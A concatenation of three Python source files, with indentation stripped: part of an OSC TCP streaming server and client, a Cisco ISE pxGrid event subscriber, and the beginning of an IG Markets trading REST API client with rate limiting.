over the client/server connection. It is thread save.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
pass
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is for all
the same.
"""
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing sychronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return None
else:
continue
except socket.error as e:
if e[0] == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return None
else:
raise e
if not tmp or len(tmp) == 0:
print("CLIENT: Socket has been closed.")
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print("CLIENT: Entered receiving thread.")
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print("CLIENT: Receiving thread terminated.")
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return False
else:
continue
except socket.error as e:
if e[0] == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
# vim:noexpandtab
|
px_subscribe.py
|
import asyncio
from .pxgrid import PxgridControl
from .config import Config
from sync.models import ISEServer
import json
import sys
import time
import logging
import threading
import hashlib
from websockets import ConnectionClosed, ConnectionClosedOK
from .ws_stomp import WebSocketStomp
from signal import SIGINT, SIGTERM
from .pxgrid_update import process_sgt_update, process_sgacl_update, process_emc_update, get_sync_account
import traceback
# from contextlib import suppress
from asgiref.sync import async_to_sync
# import concurrent.futures
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
#
# the global logger
#
logger = logging.getLogger(__name__)
#
# lock for deduplicating session events received
#
dedup_lock = threading.Lock()
#
# dictionary for storing event keys in
#
# TODO: this really needs a cleaner to remove old events
#
event_keys = {}
#
# definitions of service names possible when this script was was written
# or updated
#
SERVICE_NAMES = [
"com.cisco.ise.mdm",
"com.cisco.ise.trustsec",
"com.cisco.ise.config.trustsec",
"com.cisco.ise.session",
"com.cisco.ise.config.anc",
"com.cisco.endpoint.asset",
"com.cisco.ise.radius",
"com.cisco.ise.system",
"com.cisco.ise.sxp",
"com.cisco.ise.config.profiler",
"com.cisco.ise.pubsub",
]
loop = None
def __init__(self, external_loop):
super(StoppableThread, self).__init__()
self._stop_event = threading.Event()
self.loop = external_loop
self.ws = None
def stop(self):
self._stop_event.set()
# for task in asyncio.Task.all_tasks():
# task.cancel()
# asyncio.ensure_future(self.ws.stomp_disconnect('123'))
# asyncio.ensure_future(asyncio.sleep(2.0))
# asyncio.ensure_future(self.ws.disconnect())
asyncio.run_coroutine_threadsafe(self.ws.stomp_disconnect('123'), self.loop)
# asyncio.run_coroutine_threadsafe(asyncio.sleep(2.0), self.loop)
asyncio.run_coroutine_threadsafe(self.ws.disconnect(), self.loop)
# self.loop.stop()
# self.loop.close()
def stopped(self):
return self._stop_event.is_set()
async def future_read_message(self, ws, future):
try:
message = await ws.stomp_read_message()
future.set_result(message)
except ConnectionClosed:
self.logger.debug('Websocket connection closed')
@async_to_sync
async def default_subscription_loop(self, config, secret, ws_url, topic, pubsub_node_name):
'''
Simple subscription loop just to display whatever events arrive.
'''
self.logger.debug('starting subscription to %s at %s', topic, ws_url)
ws = WebSocketStomp(ws_url, config.node_name, secret, config.ssl_context)
self.ws = ws
await ws.connect()
await ws.stomp_connect(pubsub_node_name)
for topic_item in topic:
await ws.stomp_subscribe(topic_item)
try:
while True:
if self.stopped():
break
message = json.loads(await ws.stomp_read_message())
print(json.dumps(message, indent=2, sort_keys=True), file=sys.stdout)
sys.stdout.flush()
if "securityGroup" in message:
await process_sgt_update(message, await get_sync_account(config.config_id))
await process_emc_update(message, await get_sync_account(config.config_id))
elif "acl" in message:
await process_sgacl_update(message, await get_sync_account(config.config_id))
except asyncio.CancelledError:
pass
self.logger.debug('shutting down listener...')
await ws.stomp_disconnect('123')
await asyncio.sleep(2.0)
await ws.disconnect()
@async_to_sync
async def session_dedup_loop(self, config, secret, ws_url, topic, pubsub_node_name):
'''
Subscription loop specifically for ISE pxGrid sessionTopic events. The
logic for de-duplication is based around callingStationId, timestamp and
event content. Multiple events may have the same callimgStationId and
timestamp, but attribute changes, like profiling determining the operating
system for a device, may result in events that have the same timestamp but
different contents.
The algorithm in this routine takes this into account, and will "de-
duplicate" the events (i.e. tell you when a duplicate event arrived). It
uses MD5 (for speed) on a key-sorted dump of the event (which ensures that
duplicate events are detected by the hash digest differing.)
'''
self.logger.debug('starting subscription to %s at %s', topic, ws_url)
assert topic == '/topic/com.cisco.ise.session', '%s is not the sessionTopic'
ws = WebSocketStomp(ws_url, config.node_name, secret, config.ssl_context)
await ws.connect()
await ws.stomp_connect(pubsub_node_name)
for topic_item in topic:
await ws.stomp_subscribe(topic_item)
try:
while True:
if self.stopped():
break
message = json.loads(await ws.stomp_read_message())
with self.dedup_lock:
for s in message['sessions']:
event_text = json.dumps(s, indent=2, sort_keys=True)
event_hash = hashlib.md5(event_text.encode()).hexdigest()
event_key = '{}:{}:{}'.format(
s['callingStationId'], s['timestamp'], event_hash)
if self.event_keys.get(event_key):
self.event_keys[event_key]['count'] = self.event_keys[event_key]['count'] + 1
print('duplicate mac:timestamp:hash event, count {}'.format(
self.event_keys[event_key]['count']))
print(' --> {}'.format(ws_url))
else:
self.event_keys[event_key] = {}
self.event_keys[event_key]['count'] = 1
self.event_keys[event_key]['time'] = time.time()
self.event_keys[event_key]['event'] = event_text
self.event_keys[event_key]['md5'] = event_hash
print('{}\nevent from {}'.format('-' * 75, ws_url))
print(json.dumps(s, indent=2, sort_keys=True))
sys.stdout.flush()
except asyncio.CancelledError:
pass
self.logger.debug('shutting down listener...')
await ws.stomp_disconnect('123')
await asyncio.sleep(2.0)
await ws.disconnect()
# subscribe to topic on ALL service nodes returned
async def run_subscribe_all(self, task_list):
self.logger.debug('run_subscribe_all')
if len(task_list) > 0:
try:
return await asyncio.gather(*task_list)
except asyncio.CancelledError:
for t in task_list:
t.cancel()
return await asyncio.gather(*task_list)
# if __name__ == '__main__':
def run(self):
#
# this will parse all the CLI options, and there **must** be EITHER
# a '--services' OR '--subscribe'
#
config = Config()
#
# verbose logging if configured
#
if config.verbose:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s:%(name)s:%(levelname)s:%(message)s'))
self.logger.addHandler(handler)
self.logger.setLevel(logging.DEBUG)
# and set for stomp and ws_stomp modules also
for stomp_mod in ['stomp', 'ws_stomp', 'pxgrid']:
s_logger = logging.getLogger(stomp_mod)
handler.setFormatter(logging.Formatter('%(asctime)s:%(name)s:%(levelname)s:%(message)s'))
s_logger.addHandler(handler)
s_logger.setLevel(logging.DEBUG)
#
# if we jst have a request for services and no hostname, we can only
# list out the services we know about
#
if config.services and (not config.hostname):
print("Known services:")
for service in sorted(self.SERVICE_NAMES):
print(' %s' % service)
sys.exit(0)
#
# if we at least have a hostname, we can move forward and set up the
# px grid control object and look at either deeper service discovery
# or just subscribing to what we're asked to subscribe to
#
pxgrid = PxgridControl(config=config)
#
# in case we need to go appropve in the ISE UI
#
while pxgrid.account_activate()['accountState'] != 'ENABLED':
time.sleep(60)
# lookup for session service
if config.services:
slr_responses = []
for service in self.SERVICE_NAMES:
service_lookup_response = pxgrid.service_lookup(service)
slr_responses.append(service_lookup_response)
#
# log for debug
#
slr_string = json.dumps(service_lookup_response, indent=2, sort_keys=True)
self.logger.debug('service %s lookup response:', service)
slr_string = json.dumps(service_lookup_response, indent=2, sort_keys=True)
self.logger.debug('service lookup response:')
for s in slr_string.splitlines():
self.logger.debug(' %s', s)
#
# dump all services as a json array pretty-printed
#
print(json.dumps(slr_responses, indent=2, sort_keys=True))
sys.exit(0)
# get the details of a specific service and then exit
if config.service_details:
# first, the basic service
service_lookup_response = pxgrid.service_lookup(config.service_details)
print(json.dumps(service_lookup_response, indent=2, sort_keys=True))
# check if any of tje services have a "wsPubsubService", and, if so,
# also list out those services
if "services" in service_lookup_response:
topics = []
for s in service_lookup_response['services']:
pubsub_service = s['properties'].get('wsPubsubService')
if pubsub_service:
for p, v in s['properties'].items():
if 'topic' in p.lower():
topics.append({p: v, 'wsPubsubService': pubsub_service})
break
# lookup the pubsub service if there is one
pubsub_slr = pxgrid.service_lookup(pubsub_service)
if pubsub_slr:
print(json.dumps(pubsub_slr, indent=2, sort_keys=True))
# now exit
sys.exit(0)
# if we drop through to here, we must be subscribing, so do some initial
# checks to make sure we have enough parameters
if config.service is None or config.topic is None:
self.logger.error('must have a service and a topic!')
sys.exit(1)
#
# now subscribe
#
service_lookup_response = pxgrid.service_lookup(config.service)
slr_string = json.dumps(service_lookup_response, indent=2, sort_keys=True)
self.logger.debug('service lookup response:')
for s in slr_string.splitlines():
self.logger.debug(' %s', s)
service = service_lookup_response['services'][0]
pubsub_service_name = service['properties']['wsPubsubService']
try:
topic = []
topic_list = config.topic.split(",")
for topic_item in topic_list:
topic.append(service['properties'][topic_item])
except KeyError:
self.logger.debug('invald topic %s', config.topic)
possible_topics = [k for k in service['properties'].keys() if
k != 'wsPubsubService' and k != 'restBaseUrl' and k != 'restBaseURL']
self.logger.debug('possible topic handles: %s', ', '.join(possible_topics))
sys.exit(1)
# lookup the pubsub service
service_lookup_response = pxgrid.service_lookup(pubsub_service_name)
# select the subscription loop
subscription_loop = self.default_subscription_loop
if config.session_dedup:
subscription_loop = self.session_dedup_loop
if not config.subscribe_all:
# just subscribe to first pubsub service node returned
pubsub_service = service_lookup_response['services'][0]
pubsub_node_name = pubsub_service['nodeName']
secret = pxgrid.get_access_secret(pubsub_node_name)['secret']
ws_url = pubsub_service['properties']['wsUrl']
if self.loop:
# asyncio.set_event_loop(self.loop)
# main_task = asyncio.call_soon_threadsafe(subscription_loop(config, secret, ws_url, topic, pubsub_node_name))
# main_task = asyncio.run_coroutine_threadsafe(subscription_loop(config, secret, ws_url, topic, pubsub_node_name), self.loop)
# main_task = asyncio.ensure_future(subscription_loop(config, secret, ws_url, topic, pubsub_node_name))
# asyncio.set_event_loop(self.loop)
# loop = asyncio.get_running_loop()
main_task = self.loop.run_in_executor(None, subscription_loop, config, secret, ws_url, topic, pubsub_node_name)
# pass
else:
self.loop = asyncio.get_event_loop()
main_task = asyncio.ensure_future(subscription_loop(config, secret, ws_url, topic, pubsub_node_name))
self.loop.add_signal_handler(SIGINT, main_task.cancel)
self.loop.add_signal_handler(SIGTERM, main_task.cancel)
try:
# asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(main_task)
# self.loop.create_task(subscription_loop(config, secret, ws_url, topic, pubsub_node_name))
# self.loop.call_soon_threadsafe(asyncio.ensure_future, subscription_loop(config, secret, ws_url, topic, pubsub_node_name))
except ConnectionClosedOK:
pass
except Exception: # pragma: no cover
print(traceback.format_exc())
else:
# create all subscription tasks
subscriber_tasks = []
if self.loop:
loop = self.loop
else:
loop = asyncio.get_event_loop()
for pubsub_service in service_lookup_response['services']:
pubsub_node_name = pubsub_service['nodeName']
secret = pxgrid.get_access_secret(pubsub_node_name)['secret']
ws_url = pubsub_service['properties']['wsUrl']
task = asyncio.ensure_future(subscription_loop(config, secret, ws_url, topic, pubsub_node_name))
subscriber_tasks.append(task)
# create the run all task and graceful termination handling
try:
self.logger.debug('Create run all task')
run_all_task = asyncio.ensure_future(self.run_subscribe_all(subscriber_tasks))
self.logger.debug('Add signal handlers to run all task')
loop.add_signal_handler(SIGINT, run_all_task.cancel)
loop.add_signal_handler(SIGTERM, run_all_task.cancel)
loop.run_until_complete(run_all_task)
except Exception:
pass
# def start_background_loop(loop: asyncio.AbstractEventLoop) -> None:
# asyncio.set_event_loop(loop)
# loop.run_forever()
#
#
# def job():
# # this should be used when we are sure pxgrid is running
# loop = asyncio.new_event_loop()
# th = threading.Thread(target=start_background_loop, args=(loop,))
# th.start()
# run(loop)
#
#
# def job_try(scheduler=None):
# # this should be used when we don't know if pxgrid has been configured yet
# try:
# loop = asyncio.new_event_loop()
# th = threading.Thread(target=start_background_loop, args=(loop,))
# th.start()
# ret = run(loop)
# if ret is not False and scheduler:
# pxgrid_job = scheduler.get_job("pxgrid_monitor")
# if pxgrid_job:
# pxgrid_job.remove()
# print("pxGrid Monitor started")
# else:
# print("pxGrid configuration not present. Will check again...")
# except Exception as e:
# print("#### Exception starting scheduled job: sync_pxgrid", e)
# print(traceback.format_exc())
def run():
loop = asyncio.new_event_loop()
testthread = StoppableThread(loop)
loop.add_signal_handler(SIGINT, testthread.stop)
loop.add_signal_handler(SIGTERM, testthread.stop)
testthread.start()
def task():
testthread = None
servers = ISEServer.objects.all()
while True:
if len(servers) > 0:
server = servers[0]
if testthread:
print("Restarting pxGrid for", server, "...")
testthread.stop()
time.sleep(10)
else:
print("Starting pxGrid for", server, "...")
loop = asyncio.new_event_loop()
testthread = StoppableThread(loop)
try:
loop.add_signal_handler(SIGINT, testthread.stop)
loop.add_signal_handler(SIGTERM, testthread.stop)
except Exception:
print("Unable to assign signal handler.")
testthread.start()
server.pxgrid_reset = False
server.skip_update = True
server.save()
servers = ISEServer.objects.filter(pxgrid_reset=True)
time.sleep(60)
|
rest.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
IG Markets REST API Library for Python
https://labs.ig.com/rest-trading-api-reference
Original version by Lewis Barber - 2014 - https://uk.linkedin.com/in/lewisbarber/
Modified by Femto Trader - 2014-2015 - https://github.com/femtotrader/
""" # noqa
import json
import logging
import time
from base64 import b64encode, b64decode
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
from requests import Session
from urllib.parse import urlparse, parse_qs
from datetime import timedelta, datetime
from .utils import _HAS_PANDAS, _HAS_MUNCH
from .utils import conv_resol, conv_datetime, conv_to_ms, DATE_FORMATS
if _HAS_MUNCH:
from .utils import munchify
if _HAS_PANDAS:
from .utils import pd, np
from pandas import json_normalize
from threading import Thread
from queue import Queue, Empty
logger = logging.getLogger(__name__)
class ApiExceededException(Exception):
"""Raised when our code hits the IG endpoint too often"""
pass
class IGException(Exception):
pass
class IGSessionCRUD(object):
"""Session with CRUD operation"""
BASE_URL = None
def __init__(self, base_url, api_key, session):
self.BASE_URL = base_url
self.API_KEY = api_key
self.session = session
self.session.headers.update({
"X-IG-API-KEY": self.API_KEY,
'Content-Type': 'application/json',
'Accept': 'application/json; charset=UTF-8'
})
def _get_session(self, session):
"""Returns a Requests session if session is None
or session if it's not None (cached session
with requests-cache for example)
:param session:
:return:
"""
if session is None:
session = self.session # requests Session
else:
session = session
return session
def _url(self, endpoint):
"""Returns url from endpoint and base url"""
return self.BASE_URL + endpoint
def create(self, endpoint, params, session, version):
"""Create = POST"""
url = self._url(endpoint)
session = self._get_session(session)
session.headers.update({'VERSION': version})
response = session.post(url, data=json.dumps(params))
logging.info(f"POST '{endpoint}', resp {response.status_code}")
if response.status_code in [401, 403]:
if 'exceeded-api-key-allowance' in response.text:
raise ApiExceededException()
else:
raise IGException(f"HTTP error: {response.status_code} {response.text}")
return response
def read(self, endpoint, params, session, version):
"""Read = GET"""
url = self._url(endpoint)
session = self._get_session(session)
session.headers.update({'VERSION': version})
response = session.get(url, params=params)
# handle 'read_session' with 'fetchSessionTokens=true'
handle_session_tokens(response, self.session)
logging.info(f"GET '{endpoint}', resp {response.status_code}")
return response
def update(self, endpoint, params, session, version):
"""Update = PUT"""
url = self._url(endpoint)
session = self._get_session(session)
session.headers.update({'VERSION': version})
response = session.put(url, data=json.dumps(params))
logging.info(f"PUT '{endpoint}', resp {response.status_code}")
return response
def delete(self, endpoint, params, session, version):
"""Delete = POST"""
url = self._url(endpoint)
session = self._get_session(session)
session.headers.update({'VERSION': version})
session.headers.update({'_method': 'DELETE'})
response = session.post(url, data=json.dumps(params))
logging.info(f"DELETE (POST) '{endpoint}', resp {response.status_code}")
if '_method' in session.headers:
del session.headers['_method']
return response
def req(self, action, endpoint, params, session, version):
"""Send a request (CREATE READ UPDATE or DELETE)"""
d_actions = {
"create": self.create,
"read": self.read,
"update": self.update,
"delete": self.delete,
}
return d_actions[action](endpoint, params, session, version)
class IGService:
D_BASE_URL = {
"live": "https://api.ig.com/gateway/deal",
"demo": "https://demo-api.ig.com/gateway/deal",
}
API_KEY = None
IG_USERNAME = None
IG_PASSWORD = None
_refresh_token = None
_valid_until = None
def __init__(
self,
username,
password,
api_key,
acc_type="demo",
acc_number=None,
session=None,
return_dataframe=_HAS_PANDAS,
return_munch=_HAS_MUNCH,
retryer=None,
use_rate_limiter=False
):
"""Constructor, calls the method required to connect to
the API (accepts acc_type = LIVE or DEMO)"""
self.API_KEY = api_key
self.IG_USERNAME = username
self.IG_PASSWORD = password
self.ACC_NUMBER = acc_number
self._retryer = retryer
self._use_rate_limiter = use_rate_limiter
self._bucket_threads_run = False
try:
self.BASE_URL = self.D_BASE_URL[acc_type.lower()]
except Exception:
raise IGException("Invalid account type '%s', please provide LIVE or DEMO" %
acc_type)
self.return_dataframe = return_dataframe
self.return_munch = return_munch
if session is None:
self.session = Session() # Requests Session (global)
else:
self.session = session
self.crud_session = IGSessionCRUD(self.BASE_URL, self.API_KEY, self.session)
def setup_rate_limiter(self, ):
data = self.get_client_apps()
for acc in data:
if acc['apiKey'] == self.API_KEY:
break
# If self.create_session() is called a second time, we should exit any currently running threads
self._exit_bucket_threads()
# Horrific magic number to reduce API published allowable requests per minute to a
# value that wont result in 403 -> error.public-api.exceeded-account-trading-allowance
# Tested for non_trading = 30 (live) and 10 (demo) requests per minute.
# This wouldn't be needed if IG's API functioned as published!
MAGIC_NUMBER = 2
self._trading_requests_per_minute = acc['allowanceAccountTrading'] - MAGIC_NUMBER
logging.info(f"Published IG Trading Request limits for trading request: "
f"{acc['allowanceAccountTrading']} per minute. Using: {self._trading_requests_per_minute}")
self._non_trading_requests_per_minute = acc['allowanceAccountOverall'] - MAGIC_NUMBER
logging.info(f"Published IG Trading Request limits for non-trading request: "
f"{acc['allowanceAccountOverall']} per minute. Using {self._non_trading_requests_per_minute}")
time.sleep(60.0 / self._non_trading_requests_per_minute)
self._bucket_threads_run = True # Thread exit variable
# Create a leaky token bucket for trading requests
trading_requests_burst = 1 # If IG ever allow bursting, increase this
self._trading_requests_queue = Queue(trading_requests_burst)
# prefill the bucket so we can burst
[self._trading_requests_queue.put(True) for i in range(trading_requests_burst)]
token_bucket_trading_thread = Thread(target=self._token_bucket_trading,)
token_bucket_trading_thread.start()
self._trading_times = []
# Create a leaky token bucket for non-trading requests
non_trading_requests_burst = 1 # If IG ever allow bursting, increase this
self._non_trading_requests_queue = Queue(non_trading_requests_burst)
# prefill the bucket so we can burst
[self._non_trading_requests_queue.put(True) for i in range(non_trading_requests_burst)]
token_bucket_non_trading_thread = Thread(target=self._token_bucket_non_trading,)
token_bucket_non_trading_thread.start()
self._non_trading_times = []
# TODO
# Create a leaky token bucket for allowanceAccountHistoricalData
return
def _token_bucket_trading(self, ):
while self._bucket_threads_run:
time.sleep(60.0/self._trading_requests_per_minute)
self._trading_requests_queue.put(True, block=True)
return
def _token_bucket_non_trading(self, ):
while self._bucket_threads_run:
time.sleep(60.0/self._non_trading_requests_per_minute)
self._non_trading_requests_queue.put(True, block=True)
return
def trading_rate_limit_pause_or_pass(self, ):
if self._use_rate_limiter:
self._trading_requests_queue.get(block=True)
self._trading_times.append(time.time())
self._trading_times = [req_time for req_time in self._trading_times if req_time > time.time()-60]
logging.info(f'Number of trading requests in last 60 seonds = '
f'{len(self._trading_times)} of {self._trading_requests_per_minute}')
return
def non_trading_rate_limit_pause_or_pass(self, ):
if self._use_rate_limiter:
self._non_trading_requests_queue.get(block=True)
self._non_trading_times.append(time.time())
self._non_trading_times = [req_time for req_time in self._non_trading_times if req_time > time.time()-60]
logging.info(f'Number of non trading requests in last 60 seonds = '
f'{len(self._non_trading_times)} of {self._non_trading_requests_per_minute}')
return
def _exit_bucket_threads(self,):
if self._use_rate_limiter:
if self._bucket_threads_run:
self._bucket_threads_run = False
try:
self._trading_requests_queue.get(block=False)
except Empty:
pass
try:
self._non_trading_requests_queue.get(block=False)
except Empty:
pass
return
def _get_session(self, session):
"""Returns a Requests session (from self.session) if session is None
or session if it's not None (cached session with requests-cache
for example)
"""
if session is None:
session = self.session # requests Session
else:
assert isinstance(
session, Session
), "session must be <requests.session.Session object> not %s" % type(
session
)
session = session
return session
def _req(self, action, endpoint, params, session, version='1', check=True):
"""
Wraps the _request() function, applying a tenacity.Retrying object if configured
"""
if self._retryer is not None:
result = self._retryer.__call__(self._request, action, endpoint, params, session, version, check)
else:
result = self._request(action, endpoint, params, session, version, check)
return result
def _request(self, action, endpoint, params, session, version='1', check=True):
"""Creates a CRUD request and returns response"""
session = self._get_session(session)
if check:
self._check_session()
response = self.crud_session.req(action, endpoint, params, session, version)
if response.status_code >= 500:
raise (IGException(f"Server problem: status code: {response.status_code}, reason: {response.reason}"))
response.encoding = 'utf-8'
if self._api_limit_hit(response.text):
raise ApiExceededException()
return response
@staticmethod
def _api_limit_hit(response_text):
# note we don't check for historical data allowance - it only gets reset once a week
return 'exceeded-api-key-allowance' in response_text or \
'exceeded-account-allowance' in response_text or \
'exceeded-account-trading-allowance' in response_text
# ---------- PARSE_RESPONSE ----------- #
@staticmethod
def parse_response(*args, **kwargs):
"""Parses JSON response
returns dict
exception raised when error occurs"""
response = json.loads(*args, **kwargs)
if "errorCode" in response:
raise (Exception(response["errorCode"]))
return response
# --------- END -------- #
# ------ DATAFRAME TOOLS -------- #
@staticmethod
def colname_unique(d_cols):
"""Returns a set of column names (unique)"""
s = set()
for _, lst in d_cols.items():
for colname in lst:
s.add(colname)
return s
@staticmethod
def expand_columns(data, d_cols, flag_col_prefix=False, col_overlap_allowed=None):
"""Expand columns"""
if col_overlap_allowed is None:
col_overlap_allowed = []
for (col_lev1, lst_col) in d_cols.items():
ser = data[col_lev1]
del data[col_lev1]
for col in lst_col:
if col not in data.columns or col in col_overlap_allowed:
if flag_col_prefix:
colname = col_lev1 + "_" + col
else:
colname = col
data[colname] = ser.map(lambda x: x[col], na_action='ignore')
else:
raise (NotImplementedError("col overlap: %r" % col))
return data
# -------- END ------- #
# -------- ACCOUNT ------- #
def fetch_accounts(self, session=None):
"""Returns a list of accounts belonging to the logged-in client"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/accounts"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["accounts"])
d_cols = {"balance": [u"available", u"balance", u"deposit", u"profitLoss"]}
data = self.expand_columns(data, d_cols, False)
if len(data) == 0:
columns = [
"accountAlias",
"accountId",
"accountName",
"accountType",
"balance",
"available",
"balance",
"deposit",
"profitLoss",
"canTransferFrom",
"canTransferTo",
"currency",
"preferred",
"status",
]
data = pd.DataFrame(columns=columns)
return data
return data
def fetch_account_preferences(self, session=None):
"""
Gets the preferences for the logged in account
:param session: session object. Optional
:type session: requests.Session
:return: preference values
:rtype: dict
"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/accounts/preferences"
action = "read"
response = self._req(action, endpoint, params, session, version)
prefs = self.parse_response(response.text)
return prefs
def update_account_preferences(self, trailing_stops_enabled=False, session=None):
"""
Updates the account preferences. Currently only one value supported - trailing stops
:param trailing_stops_enabled: whether trailing stops should be enabled for the account
:type trailing_stops_enabled: bool
:param session: session object. Optional
:type session: requests.Session
:return: status of the update request
:rtype: str
"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/accounts/preferences"
action = "update"
params['trailingStopsEnabled'] = 'true' if trailing_stops_enabled else 'false'
response = self._req(action, endpoint, params, session, version)
update_status = self.parse_response(response.text)
return update_status['status']
def fetch_account_activity_by_period(self, milliseconds, session=None):
"""
Returns the account activity history for the last specified period
"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
milliseconds = conv_to_ms(milliseconds)
params = {}
url_params = {"milliseconds": milliseconds}
endpoint = "/history/activity/{milliseconds}".format(**url_params)
action = "read"
